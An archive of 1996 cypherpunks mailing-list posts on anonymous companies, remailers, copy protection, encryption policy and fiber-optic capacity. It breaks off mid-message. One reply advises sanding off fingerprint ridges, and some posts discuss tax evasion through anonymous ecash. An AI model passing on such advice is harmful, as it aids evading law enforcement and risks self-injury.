> It might be interesting to make a list of all the problems people can
> think of why this idea won't work, paired with proposed solutions and
> workarounds - sort of a mini FAQ for this important (some might say
> ultimate) cypherpunk model.

I'll just give one problem: the principal-agent problem.  How do owners of
the company make sure the managers operate the company in their best
interest?

Solution: reputation.  If the managers don't do the right things, the
owners arrange so that the managers lose reputation and won't get hired in
the future.  Unfortunately the science of reputation is not so advanced
that we know this will actually work.

Solution: smart contracts.  This is Nick Szabo's idea of building
contractual obligations into cryptographic protocols so that the parties
have no choice but to fullfil them.  But again we don't know whether this
will actually work for this problem.

A company implies a particular kind of persistent structure, with a
hiearchy of owners, managers, and employees.  It is far from clear to me
that this is the most likely organizational form in an anonymous digital
economy.  One possible alternative is to have no persistent organizations. 
Teams form spontaneously to work on individual projects.  Each individual
member jointly negotiates a contract with every other member, and these
contracts are enforced through some arbitration system. 

I'm not saying this is somehow better than the anonymous company model. 
It has just as many problems for which no easy solutions exist.  I'm just
pointing out that the properties of anonymous relationships differ quite
radically from our current ones, and that these differences may be large
enough so that the social and economic structures in such an anonymous
digital world may not merely be analogs of currently common structures. 

Wei Dai






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 18 May 1996 10:39:41 +0800
To: frantz@netcom.com
Subject: Re: Why does the state still stand:
Message-ID: <01I4S81N6AP88Y5FF6@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"frantz@netcom.com" 15-MAY-1996 22:39:50.97

>You could require daily payment and forgo the escrow agent.  (Assuming you
>are willing to risk a day's pay as an experiment in reputation.)  Note that

	This could work for fixed payments. But what about things like
profit-sharing?

>What may be a problem for such a company is a social problem.  All the
>creative groups I have worked with have had close personal relations. 
>(Although they have not had wide agreement on significant non-work
>subjects!)  I don't know if good, creative, group-produced products can be
>built without such a relationship.  Does anyone know of an example of such
>a product from an "anonymous" environment?

	No, but you might want to take a look at some psychiatrists & clinical
psychologists who are doing some work over the Net, including anonymnity. It's
discussed in the most recent or next-most-recent US News & World Report; I'll
try to remember to bring my copy in to give the URLs mentioned. I did spot that
they could use some boosts on the anonymnity and privacy side - they weren't
using encryption, and the payments were via credit card. Someone from Mark
Twain or Digicash contacting them would appear to be a good idea, as well as
someone encouraging them to use Mixmaster-type anonymous remailers; I'd prefer
if someone with more experience than I sent them an email about it.
	-Allen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: molecul1@molecule1.com (Molecule One Scientific Research Institute)
Date: Sat, 18 May 1996 11:30:45 +0800
To: "Cathay Pacific Mktg. LAX" <mail1@cathay-usa.com>
Subject: Re: CyberTraveler Auction  - Unsubscrive
Message-ID: <m0uKEaS-0008XxC@powergrid.electriciti.com>
MIME-Version: 1.0
Content-Type: text/plain


>Dear Molecule,
>
>
>Best regards,
>Cathay Pacific Airways Limited
>Los Angeles Marketing Department
>
>P.S. remove yourself from the CyberTraveler program, (should you wish to).
>Simply go to http://www.cathay-usa.com/remove.html.  Thank you.
>
>>>Dear Cathay,
>
>>>   Unsubscrive Molecule1@electriciti.com
>
>>>   In peace & wish the purest of wishes.
                                                                        
>>>                                                  sincerely,
>>>                                                            M1.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 18 May 1996 04:22:45 +0800
To: jamesd@echeque.com
Subject: Re:  SEVERE undercapacity, we need more remailer servers FAST
Message-ID: <01I4S8A124Z68Y5FF6@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"jamesd@echeque.com" 16-MAY-1996 00:44:57.85

>What do I need to do to support a remailer that posts to non binary
>newsgroups? (I do not have root control on a unix machine other than my
>employers machine, for which I am unlikely to receive approval to use 
>in this fashion.)

	Well, there are some mail-to-news gateways; I believe someone posted
on them a while back. You could write to the operators and ask them for a copy
of the software. I would suggest only accepting messages from mixmaster
remailers; this would reduce the likelihood of successful lawsuits against you
for the logs, since they won't give any information.
	-Allen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@dorsai.dorsai.org>
Date: Sat, 18 May 1996 09:28:00 +0800
To: Vipul Ved Prakash <vipul@pobox.com>
Subject: Re: Securing CDROM from piracy
In-Reply-To: <199605151949.AAA00160@fountainhead.net>
Message-ID: <Pine.SUN.3.91.960516191346.20612B-100000@dorsai>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 16 May 1996, Vipul Ved Prakash wrote:

> > Think serial numbers that are cryptographicaly secure.  If you're the 
> > only one giving them out and only to registered users, nobody can pirate 
> > without it being traced back to them.  Basically have your softrware 
> > disable itself after say 30 days unless a serial number is enterded.
> 
> Enlighten me! keeping in mind that the distributer will be cutting the CD and
> the customer will never be in contact with us. 

In that case there isn't much you can do if you can't get the customer to 
register their copy of the CDROM by calling you or by mailing you a card.

==========================================================================
 + ^ + |  Ray Arachelian |FH|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@dorsai.org|UE|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| --------------- |CC|What part of 'Congress shall make no |=\/|\/=
  /|\  |    Just Say     |KD|law abridging the freedom of speech' |==\|/==
 + v + | "No" to the NSA!|TA|        do you not understand?       |=======   
===================http://www.dorsai.org/~sunder/=========================
Obscenity laws are the crutches of inarticulate motherfuckers-Fuck the CDA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 18 May 1996 07:33:20 +0800
To: cypherpunks@toad.com
Subject: Re: Defeating fingerprints
In-Reply-To: <199605150643.XAA24223@netcom16.netcom.com>
Message-ID: <Pine.LNX.3.93.960516192513.1235C-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 14 May 1996, Be Good wrote:
> > Burglars and safecrackers sand the ridges off.
> 
> This sounds like it'd work, but quite tedious.

	Belt sander and a light touch.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 18 May 1996 20:25:35 +0800
To: frantz@netcom.com
Subject: Re: Why does the state still stand:
Message-ID: <01I4S9MPMI7K8Y5EUK@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Here's a partial copy (edited to stay within fair use) of the U.S.
News & World Report article I mentioned, off of their web site.
	-Allen

                           _UPSET? TRY CYBERTHERAPY_
                         
  _AN ONLINE VISIT TO THE PSYCHOLOGIST MAY PROVIDE AN ANSWER, CHEAP_
  
   Got the blues? Can't stop scarfing down bags of potato chips? Your
   spouse is always hostile, and you and the kids are, too? Therapy might
   help--at $125 a session. Or you could test a '90s solution: E-mail
   your way to mental health for a fraction of the cost.
   
   In the past year, angst has become a thriving niche on the World Wide
   Web. Many psychologists who are setting up home pages see electronic
   consultation as a way to plump up incomes hit by managed care and to
   attract new patients to the office. For the most part, these
   cyberpractitioners are careful to warn potential patients that the
   medium doesn't allow for detailed probing. "I give advice like Ann
   Landers and Dear Abby do," explains Dorothy Litwin, a New York
   psychologist who specializes in substance abuse, women's issues and
   couples therapy.
   
   Litwin is one of five women who joined forces about a year ago to form
   an electronic practice, Shrink-Link (address, box, Page 83). Four are
   New York State-licensed psychologists; one is a psychiatrist. Each has
   her own regular practice and specializes in a particular area of
   psychotherapy. For $20--you pay upfront by typing in your credit card
   number--you can send off your 200-word (or less) question; it is then
   routed to the appropriate therapist. Within 72 hours (often within 24
   hours), you get back two or three paragraphs of privately E-mailed
   advice.
   
   _ The short answer._ The cybercouch is most effective at giving people
   who can clearly identify the dilemma (my daughter is anorexic; I'm
   deep in debt and can't stop spending) a start toward a solution. A
   typical Shrink-Link question: "My 5-year-old was diagnosed with
   attention deficit disorder (ADD) in 1993 and has been on Ritalin ever
   since. She has been having trouble falling asleep for the past several
   months and has been moodier than usual of late. What do you think?"
   
   The gist of the response: "Some trial and error is often required
   before the correct dosage and timing are found, and symptoms such as
   sleep disturbance and moodiness often occur in the interim. Moreover,
   since children's rates of metabolism change, dosages often need to be
   adjusted. Even if the dosage is correct, the behavior irregularities
   you describe could be caused by administering the drug too late in the
   afternoon or by a host of other factors, such as nighttime fears.
   These possibilities need to be ruled out one by one until the culprit
   is found."
   
   The advice could well be to seek face-to-face counseling. E-mail
   exchanges are no basis for a diagnosis, for example, warns Marlene
   Maheu, a San Diego clinical psychologist who headed the American
   Psychological Association's subcommittee that recently looked into the
   ethics of cybertherapy. "It's impossible to get an anonymous patient's
   complete family history in a 200-word question," she says. And without
   such cues as voice tone, facial expressions and body language, how can
   a therapist be sure what the problems really are? "Smiley screen faces
   are a poor substitute for real communication," agrees Leonard Holmes,
   a therapist based in Newport News, Va., who says his online services
   are not therapy but "E-mail discussions." ("It's a bit more private
   than a call-in radio show," he notes.) Holmes charges $1.50 per minute
   and will spend as much time "with" a patient as the patient desires.
   
   Maheu's subcommittee and other psychology professionals worry that a
   lack of standards makes people seeking online help vulnerable. "When
   you are answering questions by E-mail, it's tempting to stray beyond
   your area of expertise," says Maheu. "The APA's ethical principles
   prohibit that." Critics also worry that confidentiality is at risk.
   While patients remain anonymous, a hacker could conceivably identify
   them. And these Internet sessions aren't encrypted. "You have no way
   of knowing who is printing the E-mail message out or where it is
   stored," says Thomas Nagy, a psychologist and Stanford University
   School of Medicine psychiatry professor. Nagy also worries that people
   with really significant problems will stop with an online Band-Aid.
   
   Troubling, too, is the fact that patients may know little about the
   therapist and his or her qualifications. Many sites don't disclose
   details about the counselors' experience and where they earned their
   credentials. Leonard Holmes, by contrast, provides a complete
   biography on his Web page that includes his educational background,
   what state he is licensed in, as well as areas of expertise. That way,
   interested patients can check out his professional background before a
   session.
   
[...]

   BY KERRY HANNON
   
   _A few routes to mental health_
   
   _Shrink-Link_ (http://www.westnet.com/shrink). These New York women--
   four psychologists and one psychiatrist--offer E-mail advice for $20 a
   pop.
   
   _Leonard Holmes_ (http://www.psychology.com/holmes.htm). Holmes is a
   therapist in Newport News, Va., who answers E-mail questions for $1.50
   per minute and provides links to other sites.
   
[...]

     _________________________________________________________________
   
   
   CREDITS
     
   Send comments to webmaster@usnews.com
     
   Copyright U.S. News & World Report, Inc. All rights reserved.
     
   This site is engineered by AGTinteractive [IMAGE]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 18 May 1996 10:14:13 +0800
To: Be Good <qut@netcom.com>
Subject: Re: SEVERE undercapacity, we need more remailer servers FAST
In-Reply-To: <199605150708.AAA26485@netcom16.netcom.com>
Message-ID: <Pine.LNX.3.93.960516193002.1235E-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 15 May 1996, Be Good wrote:
> 
> So what is the expense of setting up a full-featured server
> like hacktic?  Mr. Graves should start up a new server, and
> tcmay is rich, so he has no excuse.

	No, rich is a good excuse for _not_ doing it, unless it can be
done with total anonymity. If I set up a remailer, on my home computer, as
an individual, then I am a very little target. I have nothing (well, damn
little) for anyone to sue me over. What would be the point? They threaten
to sue me for what? They would spend FAR more than they could ever get out
of me, and as long as I don't violate any laws, I _might_ be able to get
"big guns" like the ACLU, EFF etc. on my side to make it a nasty fight for
no return. 
	Someone like Mr. May has assets that can be gotten, so there is
potential for gain from a lawsuit against him, both financially and
otherwise. 

	Rich is neither reason, nor excuse. Capability is the issue. It
would probably be easier for me to run a remailer than Mr. May, not that I
am better equipped mentally, but (until I started posting to this list).

	Come to think of it, would the Mixmaster package run under Xenix?
I have a 286 laying around collecting dust...

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 18 May 1996 19:27:48 +0800
To: hfinney@shell.portal.com
Subject: Re:  Why does the state still stand:
Message-ID: <01I4SAIWANV28Y5EUK@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"hfinney@shell.portal.com"  "Hal" 16-MAY-1996 10:21:05.33

>From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
>> I did not
>> include offshore.com.ai in Anguilla due to its high cost; I consider anything
>> over 25$ a month to be impractical.

>Thanks very much for making this list.  However I would not be so quick
>to reject http://offshore.com.ai.  It is run by long-time Cypherpunk
>Vince Cate, apparently specifically for the kinds of purposes we are
>discussing.  His project was discussed in a recent issue of Wired, I
>think the May issue.  (I have no contact with Cate, and have never met
>him as far as I can recall.)

	I was originally creating this as a list of places for me to look at
for sponsoring a remailer, and then decided that the list might find it useful.
I would find over 25$ a month impractical. However, in the 2nd edition I'll
include http://offshore.com.ai, with a note on the cost (and on Vince Cate's
political orientation.)

>For doing something like running a remailer which will post material
>which is illegal and/or copyrighted in the U.S., you are going to need a
>service which can stand up to pressure.  Presumably some monetary
>incentive is going to be a necessity.  Of course by this standard $25 a
>month is pretty inconsequential.

	Yes. As I recall, there's supposed to be an ecash library coming out
soon. I trust that someone involved in remailers is planning on making up one
that charges ecash once those facilities are available? There's also the
deposit idea for ones that serve an end-posting function; I didn't have this
in mind when I created the list initially, again.

>One issue is whether these banking-secrecy countries like Anguilla are
>followers of the Berne convention or other international copyright
>regulations.  Banking secrecy and software piracy don't necessarily go
>hand in hand.  I hear a lot about copyright violations in China but not
>in the Caribbean.  So actually it isn't clear that this country is the
>right location for a remailer that can post arbitrary material.

	Good point. I'll try to look up on the Berne convention.

>As for the costs to the remailer operator, he simply passes those on to
>his customers.  I think in the long run onshore remailers will be forced
>to take measures to restrict copyright-violating posts.  So if your
>choice is between paying nothing and not getting your whistle-blowing
>message posted, or paying $10 and getting it out on the nets, then
>hopefully it is worth that much to you.

>We have discussed for-pay remailers and the consensus has been that no
>one would use them when others run for free.  However now I think the
>false premise is being exposed, that free remailers simply will not be
>able to run in the current mode for much longer.  Once a single remailer
>operator has been fined thousands of dollars because somebody posted some
>copyrighted message, I don't think you will find many people eager to
>sign up as operators.  So this dream of a volatile collection of
>remailers popping up and going away just doesn't work in my view.  Why
>would anyone offer a service knowing that he was exposing himself to
>liability like this?  It would be just a game of Russian roulette,
>waiting to see whether it is your remailer which gets the bullet in the
>form of a post which violates the copyright of someone with deep
>pockets.

	I've discussed this somewhat above, but whether one needs to charge
may depend on how one runs the remailer. If it only sends to other known
remailers (ideally only to other mixmaster remailers), and the traffic analysis
defeating features work properly, then it's going to be hard to charge you for
some mail going through the net that may not have even gone through you.
	In other words, we may get a division into two types of remailers:
	A. those that charge, and do send messages other than to other
		remailers; these may also be nym servers demanding a deposit,
		with a confirmation as to who's who via signatures
	B. those that don't charge, and don't send messages other than to
		other anonymous remailers.

	A combination of the above could certainly work, also; just charge for
messages going to other than other remailers.
	-Allen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <root@edmweb.com>
Date: Sat, 18 May 1996 19:19:30 +0800
To: cypherpunks@toad.com
Subject: CSIS Supports Crypto (fwd)
Message-ID: <Pine.BSF.3.91.960516203216.288E-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


For what it's worth...

---------- Forwarded message ----------
Date: Thu, 16 May 96 20:00:38 EDT
From: David Jones <djones@insight.dcss.McMaster.CA>
To: efc-talk@insight.dcss.McMaster.CA
Subject: CSIS: growing threat of economic espionage


	  CSIS warns that Economic Espionage is growing
	 - Strong encryption may be one line of defence -

by David Jones

OTTAWA --  The Canadian Security Intelligence Service, CSIS,
wants Canadian corporations and government departments to be
aware of the growing problem of "economic espionage".

This is distinct from "industrial espionage", which is just
company-on-company spying; "economic espionage" is state-sponsored.

I spoke briefly with Ted Flanagan, who is the National Coordinator
for Economic Security and Proliferation Issues, for CSIS.
After hearing him make his pitch on the TV news, I wanted to ask him
about a possible conflict between, on the one hand, Canadian law
enforcement, which seems reluctant to see strong encryption become
widely used and, on the other hand, CSIS, which seems to be implying
that government departments and private companies should take active
steps to protect themselves, including the use of strong encryption.

Here's a few of his comments, (paraphrased)

   It's sometimes surprising for people to hear that foreign
   states do have significant resources and can easily monitor
   telecommunications, *globally*.  Companies have to be mindful
   of this.  Encryption may not be necessary for everything,
   but for particular aspects of their business communications,
   such as bid proposals, online transactions, it may be appropriate.
 
   Obviously there is a law enforcement concern about criminal
   activity being shielded by the use of encryption, but encryption
   is now a commonplace and commercially available fact of life.
   The technology exists and if individuals are going to use it for
   illicit purposes, then they're going to use it.

   The reality, though, is that the Canadian government does have
   a security policy and they do have encryption requirements.
   Encryption is the sort of thing that an awful lot of Canadian
   companies are also using, depending on their resources and needs.

   We're working with a community who we feel have a legitimate
   requirement to ensure that proprietary information is protected.
   There's no way to reverse the trend of having commercially
   available software for encryption.

So the bottom line for cops seems to be:
Encryption is here to stay; get used to it.

Ted Flanagan also explained CSIS's mandate.  It doesn't deal with
law enforcement per se, but it is concerned with national security.
It advises government departments and alerts private organizations
to potential threats.  It operates within Canada in a "defensive"
capacity.  There's been some speculation that Canada needs an
"offensive" intelligence agency that would be able to take steps
in foreign countries to further our national interests.  (Heck, if
they're spying on us, maybe we should spy on them!)  Don't bother
signing up to be the next Canadian James Bond, though.  There's no
political support for such an agency any time soon.

Part of the problem with raising corporate awareness of the threat
of espionage is that serious incidents are often hushed up because
of the damage that negative publicity would cause to the reputation
of a big Canadian company.  CSIS tries to work with companies on
a confidential basis and keeps a private database of incidents they
learn about.

So, next time you read a newspaper article about two teenage boys
getting busted for running a BBS with pirated software, keep in mind
that elsewhere there's *real* cyber-crime that is going down, ...
and although you may never hear about it, it's happening on a scale
that makes those BBS pirates look like, well, mischievous children.

Here's a random excerpt from the CSIS 1995 Annual Report

   "A foreign government is believed to have tasked its intelligence
   service to gather specific information.  The intelligence service
   in turn contracted with computer hackers to help meet the objective,
   in the course of which the hackers penetrated databases of two Canadian
   companies. These activities resulted in the compromise of the companies'
   numerous computer systems, passwords, personnel, and research files."

	URL = http://www.csis-scrs.gc.ca/eng/publicrp/pub1995e.html#economic

- -








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 18 May 1996 16:17:32 +0800
To: jamesd@echeque.com
Subject: Re:  SEVERE undercapacity, we need more remailer servers FAST
Message-ID: <199605170432.VAA23960@dfw-ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:29 PM 5/15/96 -0700, you wrote:
>What do I need to do to support a remailer that posts to non binary
>newsgroups? (I do not have root control on a unix machine other than my
>employers machine, for which I am unlikely to receive approval to use 
>in this fashion.)

1) You either need lots of patience, or you need to really _not_ care
about people getting spammed from your remailer.  The patience is
because you'll get some flames, and you really should read the 
remailer-operators@c2.org newsgroup to keep track of spammers or
spammees that you need to block.  Most of the remailers make it
easy to block based on origin or destination of messages by putting
a pattern in their block files.  Adding content blocking is just a 
Simple Matter of Programming, but it's getting to be necessary
given some of the spams to newsgroups these days, such as posting
hate articles with a victim's name attached.

2) You need a machine that will accept nntp news postings from you.
It's probably much more convenient if you can get the postings
to go out with your own domain on them (jim.com is fine; isp.net
is okay, employer.com is bad, employer's-isp.com is less bad.)  
Play around with the machine you're getting your newsfeed from.

3) You need a news-capable remailer; I've got a modified ghio2
downloadable from http://idiom.com/~wcs/remailer.c ; modify
the relevant #defines for your remailer's information, compile and go.

4) I suppose if you're going to hack the remailer anyway,
you could add a feature that adds a trailer like
==================================================================
This message was posted from the anonymous remailer at www.jim.com.
Send any complaints to webmaster@www.jim.com .
Please don't post any copyrighted material longer than fair use quotations.
And did you know that Scientology's highly overpriced documents say that
        "<random paragraph quotation>"
===================================================================
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 18 May 1996 15:00:06 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: Edited Edupage, 9 May 1996
In-Reply-To: <v02140b01adbffa43e336@[205.162.51.35]>
Message-ID: <Pine.LNX.3.93.960516220905.99B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 15 May 1996, Jim McCoy wrote:
> > Are you saying those poor people in rural West Virgina only live
> > there because they are not trying hard enough to get out?
> 
> Yes he is.  They are poor and it is all their fault.
> 
> [flame-bait approaching...]
> 
> There are two kinds of libertarians, those who hate the poor and those who
> don't.  I always seem to meet the former, I am beginning to suspect the
> latter don't exist.

	Hi Mr. McCoy, My name is Petro, and I _am_ a poor libertarian
(well, sort of a libertarian, I tend to think they are a little short
sighted, and a little to authoritarian to me)  Many of us ARE poor. We may
not _like_ being poor, and some of us are working to get out of that
situation, but most of us don't "hate" the poor. We (well, I) hate people
with their hands out. This is everyone from poor people who _won't_ try to
get out of their situation, to Multi-billion dollar corporations that
recieve government grants for over seas advertising to old people who
didn't plan for their "golden years"  and expect us to provide the gold.

> Yes, he is.  It is times like this that I must count myself among the
> pitchfork and torch wielding mob, if only because I have been cursed
> with a small amount of compassion for those who were not as lucky as I.

	Is it evil to ask people to work for their sustanence? Is it evil
to ask someone to work to get out of the situation? Is it evil to demand a
system based on reward for work, rather than a reward for being a squeaky
wheel? 
 
> BTW Mr. Avon, the reason we, the unruly mob of collectivists, socialists, and
> [insert libertarian/anarchist buzzword here] should stick a gun in your
> back and make you cough up money for education is because we can.  If you
> don't want to do so, they why don't _you_ move?  Are your feet cast in
> concrete blocks?

	Because you and your kind have been fscking up every other country
on this planet that has acheived a decent technological base. Let US have
this one. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matts Kallioniemi <matts@pi.se>
Date: Sat, 18 May 1996 04:34:11 +0800
To: cypherpunks@toad.com
Subject: Re: S-Tools 4 now available
Message-ID: <2.2.32.19960516202120.0038302c@mail.pi.se>
MIME-Version: 1.0
Content-Type: text/plain


At 17:41 1996-05-13 CST, Roy M. Silvernail wrote:
>> You will need either Windows 95 or Windows NT (at least v3.51) to use
>> this, and all further releases of S-Tools (Win32s is not sufficient).
><sigh>
>I suppose this is market pressure, but it means you are alienating a
>number of potential users (including myself).  Some of us are working
>toward being Microsoft-free, you know.

It's not just marketing, it's a fact of life. 16 bit operating systems are not
supported any more. Just as 8 bit OSes haven't been supported for quite
a while either. There will come a day when 64 bits are considered the
minimum for useful software (large database systems are already there).

You just can't stick with 16 bits forever, MS-free or not. Face it.

Matts






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 18 May 1996 21:06:54 +0800
To: cypherpunks@toad.com
Subject: Re: Past one terabit/second on fiber[PHONE GEEK TALK]
Message-ID: <199605170553.WAA22076@dfw-ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>>> "Wow", I said.  Far faster than the 2.5 Gb/sec transmission that is 
>>> currently fairly standard for long-haul fiber trunks.
>>The ads say they are selling it - that doesn't mean shipping it... yet
>>at least.  (Note that my employer is a direct competitor of Lucent 
>>so I have a vested interest in setting the facts straight)

No comment :-)  And I certainly don't presume to speak for Lucent....

Traditional fiber-optic technology is a hybrid between electrical and optical
components - big hulking multiplexers feed a high-speed electrical signal to 
a laser, which sends optical pulses down the fiber.
Every N km, a regenerator reads the photons, decides if it saw a 0 or 1,
and feeds that as an electrical signal to an output laser.  Repeat as needed.
The means that if you want to upgrade the signal speed, you not only need to
replace the muxes and lasers, you need to replace all the regens.
That's more of a problem for long-distance companies than locals
(the common FT Series G 1.7 Gb system uses them every 40 km.)

The new optical amplifiers not only go farther (e.g. 120 km),
but they do everything optically instead of dropping down to electrical
so they support a wide range of data speeds.  I don't know that
they can support the 1Tb experimental stuff, but they work fine
for the 8-color x 2.5Gb Dense Wavelength Division Multiplexing
stuff AT&T will be using.  This means that the first time you
do an upgrade, you need to rip out a bunch of regens, splice around
2/3 of them, replace 1/3 with opamps, and optionally replace the 
equipment at the ends with even bigger hulkinger multiplexers.
Depending on capacity needs, you may not fire up all 8 colors at once.
The next time you want to upgrade the same route, replace the muxes
if you didn't, or fire up more colors, or upgrade to the new Year 2005 model.
And since you've got to pick _some_ framing technology, it might
as well be SONET, which lets you build self-healing rings if you want
(the FDDI-like configuration, which not everyone uses, burns half
the capacity on restoration circuits, more than some of the less-healable
SONET configurations or mux-based restoration like AT&T's FASTAR.)

AT&T has announced that they'll be pouring lots of capital into this
over the next few years, partly to keep up with demand, and partly
to deploy SONET rings for faster restoration.

>I was figuring they'd cut out silences...as well as echo-suppression 
>cutouts.   Do they still do this?  Given modern fiber's capacity, I wonder 
>if they bother.

Voice compression and silence suppression aren't done domestically
(at least by most carriers.)  Undersea cables still use this,
though I don't know how much it's done on the newer fiber cables.
Of course, people running private networks do whatever they want,
and for overseas connections, people are often willing to trade
lower-voice-quality compression for the cost savings, especially
if the PTT on the far end is expensive.

>>I don't know that any number fiber cable is "standard" but 
>>36-fiber cable is not unusual.  To find the capacity of a cable, you
>>have to cut the number of fibers in half (as you did) because
>>generally each fiber is used only for a single direction of traffic.
>>You then have to cut it in half again because phone companies have 
>>everything redundant.  

A fairly common configuration for FT Series G is 8 fiber pairs
(one fiber for each direction), with 7 in service and 1 protection pair
to recover from mux-card and regen failures and other single-fiber hits.
To restore whole-bundle hits (e.g. backhoe fade), some of the 7 pairs
are typically dedicated to restoration - though seldom half.
The restoration pairs are often used for short-time reserved applications
such as TV connections for sports events, videoconferencing, or other 
applications where someone needs a lot of bandwidth for a short time
and is willing to be pre-empted or blocked if there's a failure.

>There's also a lot of 'dark fiber' out there, right?  Fiber laid as 
>part of a cable but not activated, because it's not yet needed.  

That's _highly_ location and company dependent.  Long-haul connections
are likely to be used efficiently, because you can get economies of scale
and because growth will fill them up (e.g. across the Rockies).
Short-haul connections (e.g. around town) are more likely to have
dark fiber because the big costs are digging up streets and paying
for government officials\\\\\\\\ licenses and permits rather than
the costs of the fiber you're putting in a trench once you dig it.
And the short-haul doesn't need regens, and often uses lower bandwidth
than the fiber can handle (OC3 muxes are much cheaper than OC48,
though per-Mbps they cost more.)

And of course, _everybody_ seems to want a T3 to the Bay Area or
other Internet-heavy locations.

>> I would add that much of a 
>>phone companies cost is in billing and customer service, etc.
>>Not the cost of installing and maintaining the fiber and equipement.
>
>This suggests that there would be a market for a LD phone company that 
>charged, say, a yearly payment of $200-300 for essentially unlimited use.
(The main 
>impediment to this would be regulatory; as I understand it LD companies have 
>to pay local telco's for connections on a per-minute connect basis.  Is that 
>right?  This needs to get fixed.)   Their billing costs would be very small. 

There's a lot of cost in switching equipment as well.  A feature-rich
voice telecom switch costs _far_ more per 64kbps voice circuit than the
1/(24*28*36=24192) fraction of a fiber that carries it.  And big muxes,
while cheaper than voice switches, are still expensive.

>>Internet telephony should make the use of bandwidth even more
>>efficient - thereby cutting costs.  The big guys who own
>>the fibers will still make money - the pipes that carry internet
>>traffic are still needed.  But the little guys will get squeezed out.
>>(until they become ISPs ;-).  Internet traffic could theoretically
>>be carried over this large amount of protection fiber (mentioned above)
>>that is out there for a much lower marginal cost than the current 
>>T3 or OC3 pipes that are being used. 

In addition to Internet telephony, ATM switch makers are doing voice
compression, and some of the fiber vendors are starting to use their
equipment to offer business voice services.  And voice-over-frame-relay,
which has more delay and therefore doesn't handle voice as well,
also is getting some market, especially internationally.

Pricing is a really difficult problem - if you price bandwidth proportional
to the 64kbps voice circuits, it's either too expensive for most businesses
to buy much or priced too low to make money on switched voice.
But if you price high-speed circuit bandwidth much cheaper than proportional,
it becomes cost-effective to buy customer-premises equipment and bulk bits
and run your own phone services.  Phone companies have been worrying about
this for video services for years, but fortunately Moore's Law and research
have let compression improve enough that you can run cheap video on
2*64kbps and good video on 6*64kbps, so they haven't been killed.
But Internet and similar data needs are starting to demand high bandwidth
at low costs, and the market will have to catch up somehow.
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 18 May 1996 16:17:30 +0800
To: cypherpunks@toad.com
Subject: Re: Spending a year dead for tax purposes
Message-ID: <199605170659.XAA22441@dfw-ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:35 PM 5/14/96 -0700, Hal <hfinney@shell.portal.com> wrote:
>I think the intention then is to create "fully anonymous" companies.
>These would be organizations whose principals and employees are known
>only by pseudonyms, even to each other.  Their only contact is
>electronic, via an anonymous network.  And the employees are paid in
>anonymous ecash, which they don't pay taxes on since it is unreported
>income.
...
>Such companies would be illegal, with everyone involved subject to
>criminal penalties for tax evasion (and no doubt a myriad of other
>violations).  But because the anonymity is protected cryptographically,

The companies themselves don't have to be illegal, and the principals
and employees may have varying needs for pseudonymity, depending on
how they're organized.  On the other hand, the governments have different
possible responses to different approaches.

For instance, an Anguillan company Aliceco owned by
a non-American could sell software products, either its own (produced
by contractors from unspecified countries) or distributed for other
vendors (Bobware, in an unspecified country, delivered via the net.)
It wouldn't be illegal in Anguilla.  Its developers/subvendors might
be breaking local law by not reporting the digicash Aliceco paid them,
but that's not Aliceco's problem - especially if Aliceco bought/hired them
from Caribsoft, another Anguillan company.  And Caribsoft may not
